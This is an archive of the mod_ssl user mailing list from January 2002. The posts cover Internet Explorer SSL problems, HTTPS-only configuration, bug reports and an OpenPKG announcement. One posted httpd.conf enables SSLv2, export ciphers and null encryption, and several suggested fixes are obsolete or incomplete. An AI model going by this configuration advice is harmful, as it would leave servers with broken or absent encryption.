en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hslex01.hsl-brabantzuid.nl id IAA12471; Tue, 8 Jan 2002 08:39:12 +0100 (MET) Received: by hslex01.hsl-brabantzuid.nl with Internet Mail Service (5.5.2650.21) id ; Tue, 8 Jan 2002 08:39:36 +0100 Message-ID: From: Rob Sterenborg To: "'modssl-users@modssl.org'" Subject: RE: Connection re-negotiation Date: Tue, 8 Jan 2002 08:39:34 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C19817.9EED1C76" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rob Sterenborg X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C19817.9EED1C76 Content-Type: text/plain; charset="iso-8859-1" > SSLRequire option).. Is it possible that the client can upgrade the > connection to a 128-bit one ??.. If yes, how to achieve that ?.. Looking around I see a lot of problems with IE6 and 128bit encryption. (just search with google on "ie6 128bit". I don't know if those problems are already fixed ; I would be surprised. Besides I didn't get to a location where to upgrade to 128bit. (Where are the clients ? Maybe MS doesn't allow you to download the high encryption IE6.) But I must admit I didn't look that well. If your clients would be using IE5.5 then there are several sites which offer downloads for either an upgrade pack or a complete IE5.5 package. For example ftp://ftp.zedz.net . Rob ------_=_NextPart_001_01C19817.9EED1C76 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable RE: Connection re-negotiation

> SSLRequire option).. Is it possible that the = client can upgrade the
> connection to a 128-bit one ??.. If yes, how to = achieve that ?..

Looking around I see a lot of problems with IE6 and = 128bit encryption. (just search with google on "ie6 128bit". = I don't know if those problems are already fixed ; I would be = surprised.

Besides I didn't get to a location where to upgrade = to 128bit. (Where are the clients ? Maybe MS doesn't allow you to = download the high encryption IE6.) But I must admit I didn't look that = well.

If your clients would be using IE5.5 then there are = several sites which offer downloads for either an upgrade pack or a = complete IE5.5 package.

For example ftp://ftp.zedz.net .

Rob

------_=_NextPart_001_01C19817.9EED1C76-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 10 10:31:50 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA07831; Thu, 10 Jan 2002 10:30:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id KAA07780; Thu, 10 Jan 2002 10:29:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id NAA04676; Wed, 9 Jan 2002 13:00:10 +0100 (MET) Date: Wed, 9 Jan 2002 13:00:10 +0100 (MET) Message-Id: <200201091200.NAA04676@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] Resource on win2000 (PR#657) CC: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Zheng XiangYang Version: 2.8.5 OS: win2000 Submission from: (NULL) (211.155.22.200) the mutex handles "lock_cs[i]" "in ssl_util_thread_setup" are not closed when the module is unloaded. Each time the child dies, more handles are opened (can see from task manager) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 10 11:09:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA10510; Thu, 10 Jan 2002 11:08:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.tiwag.at id LAA10491; Thu, 10 Jan 2002 11:07:35 +0100 (MET) Received: (from mail@localhost) by mail.tiwag.at (8.11.6/8.11.3) with ESMTP id g0AA7ZB15843 for ; Thu, 10 Jan 2002 11:07:35 +0100 Message-ID: <3559BA35534FD511A1200002557C39B0AF9B@exchange2.tiwag.co.at> From: Peer Stefan To: "'modssl-users@modssl.org'" Subject: AW: Enable HTTPS but Disable HTTP Date: Thu, 10 Jan 2002 11:07:22 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id LAA10505 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Peer Stefan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users sure. just change Listen 80 to Listen 443 in httpd.conf that should do the trick. regards, stefan -----Ursprüngliche Nachricht----- Von: Jeff Nordan [mailto:nord1899@yahoo.com] Gesendet: Montag, 07. Jänner 2002 20:41 An: modssl-users@modssl.org Betreff: Enable HTTPS but Disable HTTP I was wondering if it is possible to have a server with SSL only? Here is my setup: Apache 1.3.22 for Win32 (under Win2k) OpenSSL 0.9.6c mod_ssl 2.8.5-1.3.22 What is needed in either the install of the software or the configuration of the .conf files to get this setup to work? Or is it even possible? Thanks, Jeff __________________________________________________ Do You Yahoo!? Send FREE video emails in Yahoo! Mail! http://promo.yahoo.com/videomail/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 10 12:52:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA16582; Thu, 10 Jan 2002 12:51:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id MAA16566; Thu, 10 Jan 2002 12:50:49 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g0ABomC1571146 for modssl-users@modssl.org; Thu, 10 Jan 2002 12:50:48 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa05zSE; Thu Jan 10 12:50:42 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id MAA17364 for ; Thu, 10 Jan 2002 12:50:12 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id MAA07641 for modssl-users@modssl.org; Thu, 10 Jan 2002 12:50:14 +0100 (MET) Date: Thu, 10 Jan 2002 12:50:13 +0100 From: Thomas Binder To: "'modssl-users@modssl.org'" Subject: Re: Connection re-negotiation Message-ID: <20020110125013.A4191896@ohm.arago.de> Mail-Followup-To: "'modssl-users@modssl.org'" References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from r.sterenborg@hsl-brabantzuid.nl on Tue, Jan 08, 2002 at 08:39:34AM +0100 Organization: arago GmbH Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Tue, Jan 08, 2002 at 08:39:34AM +0100, Rob Sterenborg wrote: > Looking around I see a lot of problems with IE6 and 128bit encryption. > (just search with google on "ie6 128bit". I don't know if those > problems are already fixed ; I would be surprised. Maybe this KB article helps: http://support.microsoft.com/support/kb/articles/Q261/3/28.ASP (Note: I don't use IE6, so this is just a wild guess based on a quick search at groups.google.com) Ciao Thomas ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 11 12:41:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA28956; Fri, 11 Jan 2002 12:40:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA28920; Fri, 11 Jan 2002 12:39:35 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 934FD4CE523; Fri, 11 Jan 2002 12:39:34 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) id g0BBdOM55144; Fri, 11 Jan 2002 12:39:24 +0100 (CET) Date: Fri, 11 Jan 2002 12:39:24 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org, openssl-users@openssl.org, openssl-dev@openssl.org, dev@httpd.apache.org Subject: [ANNOUNCE] OpenPKG 1.0 (cross-platform RPM-based Unix software packaging) Message-ID: <20020111113924.GA54749@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Please excuse this slightly off-topic posting. People have wondered what I've done over the last 14 months and why further development on mod_ssl and my engagement in the OpenSSL and Apache projects had to be slowed down in this time. Most of my contributions were moved to the silent background. Some people even feared that Ralf is doing closed source software development now. No, the opposite is true. I'm still the same Open Source fanatic, believe me. I just avoided to make something public until is is really ready for the public. But since today the result of over one year of strong development is now publically available and I'm proudly announcing it: OpenPKG, the world of cross-platform RPM-based Unix software packaging. OpenPKG is one of the largest projects I've ever done in my life. My development team at Cable & Wireless Germany plus dozens of contributors have helped together since November 2000 to solve a problem I already tried to solve two times in the last 10 years. And the third solution OpenPKG is the one which finally successfully solved it (at least for me ;) We are using it in production since April 2001 to establish all customer servers in the Internet Solution Center (ISC) of Cable & Wireless Germany and certainly there will be some other groups in this world which benefit from our work, too. That's why it is both based on Open Source software and itself released again as Open Source. If you want to know more, glance over the attached PR text and visit our project site at http://www.openpkg.org/. Thanks for listening and... happy packaging! Oh, and we have also packaged OpenSSL and Apache+modssl in OpenPKG, of course ;) Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com ========================================================================= Now available: OpenPKG 1.0 www.openpkg.org A flexible and powerful software packaging facility, OpenPKG eases installation and administration of Unix software across several platforms. It primarily targets the Unix platforms FreeBSD, Linux and Solaris, but is portable across mostly all modern Unix flavors. Consolidating different vendor approaches into a unified architecture, it assists in administration of large networks previously complicated by nonconformant systems. OpenPKG leverages proven technologies like Red Hat Package Manager (RPM) and neatly provides an additional system layer on top of the operating system. It is a fully self-contained with minimal external dependencies (no RPM pre-installation required), and installs itself by means of a tricky bootstrapping procedure with minimal operating system intrusion. OpenPKG especially supports multiple installation instances on the same system. OpenPKG was created in November 2000 and after over one year of development it is already a mature technology in production use. It is available as Open Source and is further maintained by both Ralf S. Engelschall's development team at Cable & Wireless Germany and their contributors. For more details visit: http://www.openpkg.org/ ftp://ftp.openpkg.org/ ========================================================================= ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 11 14:31:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA03800; Fri, 11 Jan 2002 14:30:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id OAA03769; Fri, 11 Jan 2002 14:29:58 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.getin.pl id OAA20824; Thu, 10 Jan 2002 14:33:41 +0100 (MET) From: yazard@box43.pl Received: from mail pickup service by mail1.getin.pl with Microsoft SMTPSVC; Thu, 10 Jan 2002 14:32:29 +0100 Received: from skrzynka.getin.pl ([10.0.3.5]) by mail1.getin.pl with Microsoft SMTPSVC(5.5.1877.507.50); Thu, 10 Jan 2002 14:32:28 +0100 Received: from mail pickup service by skrzynka.getin.pl with Microsoft SMTPSVC; Thu, 10 Jan 2002 14:31:38 +0100 Content-Class: urn:content-classes:message To: Subject: modssl and nCipher HSM Date: Thu, 10 Jan 2002 14:31:38 +0100 Message-ID: <94df01c199db$21a8c240$2301a8c0@internal.getin.pl> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-2" X-Mailer: Microsoft CDO for Windows 2000 Thread-Index: AcGZ2yGoQ9AD7gUrEdaX/wBQi8mIqg== X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 X-GetinMailad-Uid: 7A4EE9F4-29E8-4976-9D8D-D3093D8DC3F7 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA20863 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: yazard@box43.pl X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, Does anybody know if it is possible to use HSM in modssl (or is it planned)? Currently my nCipher module could only work as SSL accelerator (could not use private keys in HSM module). New OpenSSL library has this functionality ... best regards, -- Piotr Wojciechowski -- Serwis Aukcji Biznesowych: http://www.aukcje.getin.pl Maszyny i urzadzenia przemyslowe, budowlane i biurowe Wyprzedaze nadwyzek produkcyjnych i koncowek asortymentu Koszt otwarcia aukcji oraz udzial w biuletynie teraz tylko 50 PLN! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 11 14:32:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA03836; Fri, 11 Jan 2002 14:31:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id OAA03797; Fri, 11 Jan 2002 14:30:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id QAA00237; Thu, 10 Jan 2002 16:37:07 +0100 (MET) Date: Thu, 10 Jan 2002 16:37:07 +0100 (MET) Message-Id: <200201101537.QAA00237@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] DirectoryIndex/Indexes with Client Auth (PR#658) CC: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Peter Pramberger Version: 2.8.4/2.8.5 OS: Linux Submission from: (NULL) (212.95.31.57) Sorry if this has been referenced elsewhere, I could find no mention of it. When I configure the following ssl virtual host, entering the following urls work fine - I get the index.html and the directory listing after entering username and password: https://servername/ https://servername/subdir-without-index.html/ #### part of httpd.conf #### DirectoryIndex index.html ServerName xxx ... AuthType Basic AuthName xxx AuthUserFile /... require valid-user Options +Indexes +FollowSymLinks #### end #### As soon as I add client authentication, I always get error 403 (Forbidden). No directory listing or index page anymore - I have to enter the full url (with filename). #### part of httpd.conf #### DirectoryIndex index.html ServerName xxx ... SSLCACertificateFile "/..." SSLVerifyClient require SSLVerifyDepth 1 SSLOptions +FakeBasicAuth +OptRenegotiate +StdEnvVars AuthType Basic AuthName xxx AuthUserFile /... require valid-user Options +Indexes +FollowSymLinks #### end #### The auth config is definitive _not_ the problem, it works as expected. There are also no entries in the error log, only in the access log. I have tried a lot of combinations (Options, SSLOptions, Directory directives, Location di- rectives) - no success. Apache config is nearly default. SSL config is also default (only SSLSessionCache -> shmht/shmcb). Software: Apache 1.3.20, 1.3.22 (DSO!) OpenSSL 0.9.6b mod_ssl 2.8.4, 2.8.5 Linux 2.4.9 + 2.4.17 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 11 20:01:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA23307; Fri, 11 Jan 2002 20:00:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailout05.sul.t-online.com id TAA23197; Fri, 11 Jan 2002 19:59:08 +0100 (MET) Received: from fwd00.sul.t-online.de by mailout05.sul.t-online.com with smtp id 16P6lE-0008Kd-07; Fri, 11 Jan 2002 19:50:41 +0100 Received: from KRIEGER (320094062685-0001@[62.226.11.150]) by fwd00.sul.t-online.com with esmtp id 16P6l3-1RRqMaC; Fri, 11 Jan 2002 19:50:29 +0100 Message-ID: <005601c19ad2$5bdc2bd0$6564a8c0@KRIEGER> From: Marcel.Selhorst@t-online.de (Marcel Selhorst) To: Subject: Problems with Apache / mod_ssl and Internet Explorer 5/6 Date: Fri, 11 Jan 2002 20:00:38 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0051_01C19ADA.A41915E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Sender: 320094062685-0001@t-dialin.net Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Marcel.Selhorst@t-online.de (Marcel Selhorst) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0051_01C19ADA.A41915E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi everyone, I=B4ve got a big problem: I installed on SuSE Linux 7.3 the Apache Web Server including the mod_ssl in order to run a secured webinterface for my IMAP-Server... Unsecured everything works just fine in every Browser. After installing the SSL-Plugin I generated a custom certificate and = everything works fine with Netscape / Konquerer / w3m. But when I try to connect via https with any version of Microsofts Internet Explorer I get the message, that the page cannot be displayed. I found out that there are many problems with MSIE, and I did all the fixes. Here are parts of my httpd.conf. Does anyone has an idea? Apache-Version 1.3.20 mod_ssl Version 2.8.4 openssl Version 0.96b PHP Version Pear 4.1.0 MySQL Version 3.21 [...] SSLPassPhraseDialog builtin SSLSessionCache dbm:/var/run/ssl_scache SSLSessionCacheTimeout 300 SSLRandomSeed startup builtin SSLRandomSeed connect builtin SSLEngine on #*** here I tried both versions .... no change #SSLProtocol ALL -SSLv3=20 SSLCipherSuite = ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLVerifyClient none SSLOptions +StdEnvVars SSLOptions +StdEnvVars #*** here I tried both versions .... no change #SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown = downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown downgrade-1.0 = force-response-1.0 BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown ------=_NextPart_000_0051_01C19ADA.A41915E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi everyone,
 
I=B4ve got a big problem:
I installed on SuSE Linux 7.3 the = Apache Web Server=20 including
the mod_ssl in order to run a secured = webinterface=20 for my
IMAP-Server...
Unsecured everything works just fine in = every=20 Browser.
After installing the SSL-Plugin I = generated a=20 custom certificate and everything
works fine with Netscape / Konquerer / = w3m.
But=20 when I try to connect via https with any version of = Microsofts
Internet Explorer I get the message, = that the page=20 cannot be
displayed.
I found out that there are many = problems with MSIE,=20 and I did all
the fixes. Here are parts of my = httpd.conf. Does=20 anyone has an idea?
Apache-Version 1.3.20
mod_ssl Version 2.8.4
openssl Version 0.96b
PHP Version Pear 4.1.0
MySQL Version 3.21
 
[...]
SSLPassPhraseDialog  = builtin
SSLSessionCache         = dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  300
SSLRandomSeed startup = builtin
SSLRandomSeed=20 connect builtin
 
<VirtualHost = _default_:443>
SSLEngine=20 on
 
#*** here I tried both versions .... no = change
#SSLProtocol ALL = -SSLv3 
SSLCipherSuite=20 ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
 
SSLVerifyClient none
 
<Files ~=20 "\.(cgi|shtml|phtml|php3|php?)$">
    SSLOptions=20 +StdEnvVars
</Files>
<Directory=20 "/usr/local/httpd/cgi-bin">
    SSLOptions=20 +StdEnvVars
</Directory>
 
#*** here I tried both versions .... no = change
#SetEnvIf User-Agent ".*MSIE.*" = nokeepalive=20 ssl-unclean-shutdown downgrade-1.0 force-response-1.0
BrowserMatch = "MSIE=20 [1-4]" nokeepalive ssl-unclean-shutdown downgrade-1.0=20 force-response-1.0
BrowserMatch "MSIE [5-9]"=20 ssl-unclean-shutdown
------=_NextPart_000_0051_01C19ADA.A41915E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 11 20:33:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA25075; Fri, 11 Jan 2002 20:31:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ahmler5.mail.eds.com id UAA25051; Fri, 11 Jan 2002 20:30:42 +0100 (MET) Received: from ahmlir3.mail.eds.com (ahmlir3-2.mail.eds.com [192.85.154.27]) by ahmler5.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0BJUdb30729 for ; Fri, 11 Jan 2002 14:30:39 -0500 Received: from ahmlir3.mail.eds.com (localhost [127.0.0.1]) by ahmlir3.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0BJUcn24730 for ; Fri, 11 Jan 2002 14:30:38 -0500 (EST) Received: from usahm001.examhub.exch.eds.com (usahm001.examhub.exch.eds.com [207.37.138.140]) by ahmlir3.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0BJUbc24713 for ; Fri, 11 Jan 2002 14:30:37 -0500 (EST) Received: by usahm001.examhub.exch.eds.com with Internet Mail Service (5.5.2655.51) id ; Fri, 11 Jan 2002 14:30:32 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E260@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: Problems with Apache / mod_ssl and Internet Explorer 5/6 Date: Fri, 11 Jan 2002 14:30:32 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C19AD6.6F62F680" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C19AD6.6F62F680 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I had this problem and spent many, many hours researching. In my = research, I came across many others with the same problem. So you are not the = only one. I received the "Page cannot be displayed" error along with = "Cannot find server or DNS error". I tried the fix suggested in the Apache = mod_ssl FAQ (change to http.conf file to downgrade to http 1.0). It did not = work. It looks like you also tried the fix, too. I filed a bug report in the = Bug Database for Apache mod_ssl and never received any response in over 5 months. I eventually worked with Oracle Worldwide Support because I = was using the Apache Web Server and mod_ssl as packaged with the Oracle9i Application Server. I had to work up through the ranks to get the = problem addressed. Eventually, I implemented two changes that seemed to reduce = the error with much, much less frequency. I still get the error, but not = very often. It looks like you have also tried one of the solutions I implemented = (change to http.conf file removing 'nokeepalive'). The other fix I = implemented, Oracle actually had to patch a DLL file of theirs that I believe works = with the mod_ssl component. Anyways, I saw the code fix they implemented = and it has something to do with retrying the read from the port when it fails = to read the data (they enclosed the read in a "retry" loop until = successful). I don't know if this information will help. But, I am providing the details: =20 I received this error in two different cases. One case it happened intermittently on almost any page I tried to access from our website = using SSL and the IE browser. I reduced the errors, quite significantly, but = not entirely, by making the following change in the Apache http.conf file: From: #SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown To: SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown In the other case, I always received the error when I tried to use = Oracle Portal's Add-Item-Wizard pages to upload a document to Oracle Portal's Content Area. Here was the resolution for that case: Implemented solution for Oracle Bug No. 1821195 (When uploading large = file using modplsql & SSL error reading data from client) by replacing the existing ApacheModuleSSL.dll file with the patched file referenced in = the bug details. According to the details for the ApacheModuleSSL.dll = patch, there was mention of a bug in the "select" function in Windows NT 4.0: "When checking a socket, if data can be read without blocking, select = () returns yes, but when actually reading from the socket with recv(), = that function returns WSAEWOULDBLOCK, which says that reading would block. = It seems that this problem does not occur in usual operation, but only in = an SSL enabled Apache (modssl or apache-ssl) with https. The code for = WIN32, which handles writing to a socket, already contains a workaround for = this. The code for reading from a socket did not have a workaround."=20 Carol Kuczborski=20 EDS - Enabling Business Solutions=20 MS A6N-B47=20 13600 EDS Drive=20 Herndon, VA 20171=20 -----Original Message----- From: Marcel.Selhorst@t-online.de [mailto:Marcel.Selhorst@t-online.de] Sent: Friday, January 11, 2002 2:01 PM To: modssl-users@modssl.org Subject: Problems with Apache / mod_ssl and Internet Explorer 5/6 Hi everyone, =20 I=B4ve got a big problem: I installed on SuSE Linux 7.3 the Apache Web Server including the mod_ssl in order to run a secured webinterface for my IMAP-Server... Unsecured everything works just fine in every Browser. After installing the SSL-Plugin I generated a custom certificate and everything works fine with Netscape / Konquerer / w3m. But when I try to connect via https with any version of Microsofts Internet Explorer I get the message, that the page cannot be displayed. I found out that there are many problems with MSIE, and I did all the fixes. Here are parts of my httpd.conf. Does anyone has an idea? Apache-Version 1.3.20 mod_ssl Version 2.8.4 openssl Version 0.96b PHP Version Pear 4.1.0 MySQL Version 3.21 =20 [...] SSLPassPhraseDialog builtin SSLSessionCache dbm:/var/run/ssl_scache SSLSessionCacheTimeout 300 SSLRandomSeed startup builtin SSLRandomSeed connect builtin =20 SSLEngine on =20 #*** here I tried both versions .... no change #SSLProtocol ALL -SSLv3=20 SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL =20 SSLVerifyClient none =20 SSLOptions +StdEnvVars SSLOptions +StdEnvVars =20 #*** here I tried both versions .... no change #SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown = downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown ------_=_NextPart_001_01C19AD6.6F62F680 Content-Type: text/html; charset="iso-8859-1"

I had this problem and spent many, many hours researching.  In my research, I came across many others with the same problem.  So you are not the only one.  I received the "Page cannot be displayed" error along with "Cannot find server or DNS error".  I tried the fix suggested in the Apache mod_ssl FAQ (change to http.conf file to downgrade to http 1.0).  It did not work.  It looks like you also tried the fix, too. I filed a bug report in the Bug Database for Apache mod_ssl and never received any response in over 5 months.  I eventually worked with Oracle Worldwide Support because I was using the Apache Web Server and mod_ssl as packaged with the Oracle9i Application Server.  I had to work up through the ranks to get the problem addressed.  Eventually, I implemented two changes that seemed to reduce the error with much, much less frequency.  I still get the error, but not very often.

It looks like you have also tried one of the solutions I implemented (change to http.conf file removing 'nokeepalive').  The other fix I implemented, Oracle actually had to patch a DLL file of theirs that I believe works with the mod_ssl component.  Anyways, I saw the code fix they implemented and it has something to do with retrying the read from the port when it fails to read the data (they enclosed the read in a "retry" loop until successful).  I don't know if this information will help.  But, I am providing the details:  

I received this error in two different cases. One case it happened intermittently on almost any page I tried to access from our website using SSL and the IE browser. I reduced the errors, quite significantly, but not entirely, by making the following change in the Apache http.conf file:

From: #SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

To: SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown

In the other case, I always received the error when I tried to use Oracle Portal's Add-Item-Wizard pages to upload a document to Oracle Portal's Content Area. Here was the resolution for that case:

Implemented solution for Oracle Bug No. 1821195 (When uploading large file using modplsql & SSL error reading data from client) by replacing the existing ApacheModuleSSL.dll file with the patched file referenced in the bug details. According to the details for the ApacheModuleSSL.dll patch, there was mention of a bug in the "select" function in Windows NT 4.0:

"When checking a socket, if data can be read without blocking, select () returns yes, but when actually reading from the socket with recv(), that function returns WSAEWOULDBLOCK, which says that reading would block. It seems that this problem does not occur in usual operation, but only in an SSL enabled Apache (modssl or apache-ssl) with https. The code for WIN32, which handles writing to a socket, already contains a workaround for this. The code for reading from a socket did not have a workaround."

Carol Kuczborski
EDS - Enabling Business Solutions
MS A6N-B47
13600 EDS Drive
Herndon, VA 20171

-----Original Message-----
From: Marcel.Selhorst@t-online.de [mailto:Marcel.Selhorst@t-online.de]
Sent: Friday, January 11, 2002 2:01 PM
To: modssl-users@modssl.org
Subject: Problems with Apache / mod_ssl and Internet Explorer 5/6

Hi everyone,
 
I´ve got a big problem:
I installed on SuSE Linux 7.3 the Apache Web Server including
the mod_ssl in order to run a secured webinterface for my
IMAP-Server...
Unsecured everything works just fine in every Browser.
After installing the SSL-Plugin I generated a custom certificate and everything
works fine with Netscape / Konquerer / w3m.
But when I try to connect via https with any version of Microsofts
Internet Explorer I get the message, that the page cannot be
displayed.
